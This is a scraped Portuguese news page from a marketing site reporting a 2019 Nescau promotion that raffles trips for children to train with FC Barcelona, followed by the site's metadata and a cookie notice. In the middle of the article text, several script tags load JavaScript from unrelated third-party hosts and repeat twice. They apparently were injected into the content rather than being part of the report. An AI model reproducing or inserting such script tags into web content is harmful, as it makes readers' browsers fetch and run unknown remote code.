\n\n\n\n\n\n\n\n","alternativeHeadline":"Serão 10 viagens e os ganhadores participarão de treino, de um jogo e poderão encontrar ídolos do clube catalão. Além disso, os consumidores poderão ganhar prêmios instantâneos, dentro da lata de 400g.\n\n\n\n\n\n\n\n\n\n","abstract":"Serão 10 viagens e os ganhadores participarão de treino, de um jogo e poderão encontrar ídolos do clube catalão. Além disso, os consumidores poderão ganhar prêmios instantâneos, dentro da lata de 400g.\n\n\n\n\n\n\n\n\n\n","articleBody":"Serão 10 viagens e os ganhadores participarão de treino, de um jogo e poderão encontrar ídolos do clube catalão. Além disso, os consumidores poderão ganhar prêmios instantâneos, dentro da lata de 400g.\r\n\r\nNescau lança a ação promocional Juntos em Barcelona, para os apaixonados pelo futebol. Serão sorteadas 10 viagens para a cidade catalã, para crianças entre 8 e 12 anos (com um acompanhante acima de 21 anos para cada uma).\r\n\r\n As melhores promoções você encontra aqui.\r\n\r\nLeia também: Nescau troca sua marca pelos valores do esporte.\r\n\r\nOs ganhadores irão à Espanha participar do training camp do clube – treinos, palestras, vídeos e outras atividades que fazem parte da rotina dos jogadores. Além disso, terão direito a ir em um jogo no Camp Nou, um dia de passeio por Barcelona, onde fica a sede do clube, e poderão encontrar seus grandes ídolos do esporte que atuam ou atuaram no clube.\r\n\r\n\r\n\r\n"O Barça é um dos clubes preferidos entre as crianças e jovens de todo o mundo, e no Brasil não é diferente. Com a promoção Juntos em Barcelona, Nescau confirma seu DNA esportivo. Nosso investimento em campanhas como essa tem o objetivo de incentivar um estilo de vida saudável para as novas gerações, sempre por meio de atividades esportivas. O futebol é uma paixão e grandes times, grandes atletas, ensinam os valores que a marca de achocolatados da Nestlé apoia e dissemina, como coragem, perseverança, confiança, iniciativa, entre outras.", afirma Rodrigo Lopes, head de Marketing de Bebidas da Nestlé.\r\n\r\nO FC Barcelona é um dos clubes com o maior número de torcedores ao redor do mundo (aproximadamente 44 milhões), e com maior base de seguidores em redes sociais entre todos os esportes (cerca de 240 milhões de pessoas). A campanha foi desenvolvida pela Oglivy.\r\n\r\nMecânica da promoção\r\n\r\nPara participar da promoção, é necessário adquirir um ou mais produtos Nescau participantes e cadastrar o cupom fiscal no site. Após realizar o cadastro, o consumidor recebe um ou mais números da sorte para concorrer à viagem.\r\n\r\nAlém da chance de conhecer o maior clube de futebol do mundo, o consumidor concorre a prêmios instantâneos, como camisetas, mochilas e bolas do time catalão. \r\n\r\nOs cards premiados podem ser encontrados dentro das latas de Nescau 400g. A promoção começou no dia 12 de novembro e segue até 31 de janeiro. As viagens serão em março de 2020 e sorteadas em três momentos: 14 de dezembro de 2019, 11 de janeiro e 2 de fevereiro de 2020. \r\n\r\n\r\n\r\nConfira a campanha da promoção, assim como a lista dos produtos participantes e o regulamento completo no site.","speakable":{"@type":"SpeakableSpecification","cssSelector":[".single-head",".single-body"]},"isAccessibleForFree":true,"genre":["Promoção"]},{"@type":"WebPage","@id":"https://www.promoview.com.br/promo-de-nescau-leva-criancas-para-treinar-no-barcelona/","url":"https://www.promoview.com.br/promo-de-nescau-leva-criancas-para-treinar-no-barcelona/","name":"Promo de Nescau leva crianças para treinar no Barcelona - Promoview - Insights sobre Brand Experience","isPartOf":{"@id":"https://www.promoview.com.br/#website"},"primaryImageOfPage":{"@id":"https://www.promoview.com.br/promo-de-nescau-leva-criancas-para-treinar-no-barcelona/#primaryimage"},"image":{"@id":"https://www.promoview.com.br/promo-de-nescau-leva-criancas-para-treinar-no-barcelona/#primaryimage"},"thumbnailUrl":"https://uploads.promoview.com.br/2023/12/d217ea8f.jpeg","datePublished":"2019-11-14T06:54:00+00:00","dateModified":"2025-04-25T04:21:29+00:00","description":"Serão 10 viagens e os ganhadores participarão de treino, de um jogo e poderão encontrar ídolos do clube catalão. Além disso, os consumidores poderão ganhar prêmios instantâneos, dentro da lata de 400g.","breadcrumb":{"@id":"https://www.promoview.com.br/promo-de-nescau-leva-criancas-para-treinar-no-barcelona/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https://www.promoview.com.br/promo-de-nescau-leva-criancas-para-treinar-no-barcelona/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/promo-de-nescau-leva-criancas-para-treinar-no-barcelona/#primaryimage","url":"https://uploads.promoview.com.br/2023/12/d217ea8f.jpeg","contentUrl":"https://uploads.promoview.com.br/2023/12/d217ea8f.jpeg","width":710,"height":399},{"@type":"BreadcrumbList","@id":"https://www.promoview.com.br/promo-de-nescau-leva-criancas-para-treinar-no-barcelona/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.promoview.com.br/"},{"@type":"ListItem","position":2,"name":"Experiência de Marca","item":"https://www.promoview.com.br/experiencia-de-marca/"},{"@type":"ListItem","position":3,"name":"Promoção","item":"https://www.promoview.com.br/experiencia-de-marca/promocao/"},{"@type":"ListItem","position":4,"name":"Promo de Nescau leva crianças para treinar no Barcelona"}]},{"@type":"WebSite","@id":"https://www.promoview.com.br/#website","url":"https://www.promoview.com.br/","name":"Promoview","description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","publisher":{"@id":"https://www.promoview.com.br/#organization"},"alternateName":"Promoview","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.promoview.com.br/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https://www.promoview.com.br/#organization","name":"Promoview","alternateName":"Promoview","url":"https://www.promoview.com.br/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/logo/image/","url":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","contentUrl":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","width":696,"height":696,"caption":"Promoview"},"image":{"@id":"https://www.promoview.com.br/#/schema/logo/image/"},"sameAs":["https://www.instagram.com/promoview/","https://www.linkedin.com/company/promoview/","https://www.youtube.com/channel/UCDOyD3fGgwpvMsWF7pqi7AA","https://news.google.com/publications/CAAqBwgKMK-NuAswvKjPAw?hl=pt-BR&gl=BR&ceid=BRpt-419","https://open.spotify.com/show/6mken3c6hcUDSsc3VwEDlf?si=a2b3d9018a954fcc&nd=1&dlsi=695ae8972acb48d6","https://api.whatsapp.com/send/?phone=5511948022977&text&type=phone_number&app_absent=0"],"description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","email":"[email protected]","telephone":"41 991944093","legalName":"JULIO FEIJO NETO ME","foundingDate":"2006-08-18","vatID":"05.151.320/0001-66","numberOfEmployees":{"@type":"QuantitativeValue","minValue":"1","maxValue":"10"}},{"@type":"ItemList","@id":"https://www.promoview.com.br#itemlist","itemListElement":[]},{"@type":"Person","@id":"https://www.promoview.com.br/#/schema/person/image/af4fc0bf9cab018130e1c090810cbd48","name":"Redação Promoview","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/person/image/5c28630bdeeca78554bd08ce207d5213","url":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","contentUrl":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","width":120,"height":120,"caption":"Redação Promoview"},"url":"https://www.promoview.com.br/autor/redacao-promoview/"}]}
Promo de Nescau leva crianças para treinar no Barcelona
Serão 10 viagens e os ganhadores participarão de treino, de um jogo e poderão encontrar ídolos do clube catalão. Além disso, os consumidores poderão ganhar prêmios instantâneos, dentro da lata de 400g.
<script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script><script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script><script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573701513358" type="text/javascript"></script><script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>
<script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script>
<script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script>
<script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573701872271" type="text/javascript"></script>
<script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>
Serão 10 viagens e os ganhadores participarão de treino, de um jogo e poderão encontrar ídolos do clube catalão. Além disso, os consumidores poderão ganhar prêmios instantâneos, dentro da lata de 400g.
Nescau lança a ação promocional Juntos em Barcelona, para os apaixonados pelo futebol. Serão sorteadas 10 viagens para a cidade catalã, para crianças entre 8 e 12 anos (com um acompanhante acima de 21 anos para cada uma).
Os ganhadores irão à Espanha participar do training camp do clube – treinos, palestras, vídeos e outras atividades que fazem parte da rotina dos jogadores. Além disso, terão direito a ir em um jogo no Camp Nou, um dia de passeio por Barcelona, onde fica a sede do clube, e poderão encontrar seus grandes ídolos do esporte que atuam ou atuaram no clube.
"O Barça é um dos clubes preferidos entre as crianças e jovens de todo o mundo, e no Brasil não é diferente. Com a promoção Juntos em Barcelona, Nescauconfirma seu DNA esportivo. Nosso investimento em campanhas como essa tem o objetivo de incentivar um estilo de vida saudável para as novas gerações, sempre por meio de atividades esportivas. O futebol é uma paixão e grandes times, grandes atletas, ensinam os valores que a marca de achocolatados da Nestlé apoia e dissemina, como coragem, perseverança, confiança, iniciativa, entre outras.", afirma Rodrigo Lopes, head de Marketing de Bebidas da Nestlé.
O FC Barcelona é um dos clubes com o maior número de torcedores ao redor do mundo (aproximadamente 44 milhões), e com maior base de seguidores em redes sociais entre todos os esportes (cerca de 240 milhões de pessoas). A campanha foi desenvolvida pela Oglivy.
Mecânica da promoção
Para participar da promoção, é necessário adquirir um ou mais produtos Nescau participantes e cadastrar o cupom fiscal no site. Após realizar o cadastro, o consumidor recebe um ou mais números da sorte para concorrer à viagem.
Além da chance de conhecer o maior clube de futebol do mundo, o consumidor concorre a prêmios instantâneos, como camisetas, mochilas e bolas do time catalão.
Os cards premiados podem ser encontrados dentro das latas de Nescau 400g. A promoção começou no dia 12 de novembro e segue até 31 de janeiro. As viagens serão em março de 2020 e sorteadas em três momentos: 14 de dezembro de 2019, 11 de janeiro e 2 de fevereiro de 2020.
Confira a campanha da promoção, assim como a lista dos produtos participantes e o regulamento completo no site.
Nós usamos cookies e outras tecnologias semelhantes para melhorar a sua experiência em nossos serviços, personalizar publicidade e recomendar conteúdo de seu interesse. Ao utilizar nossos serviços, você está ciente dessa funcionalidade.
Termos de Uso
e
Política de privacidade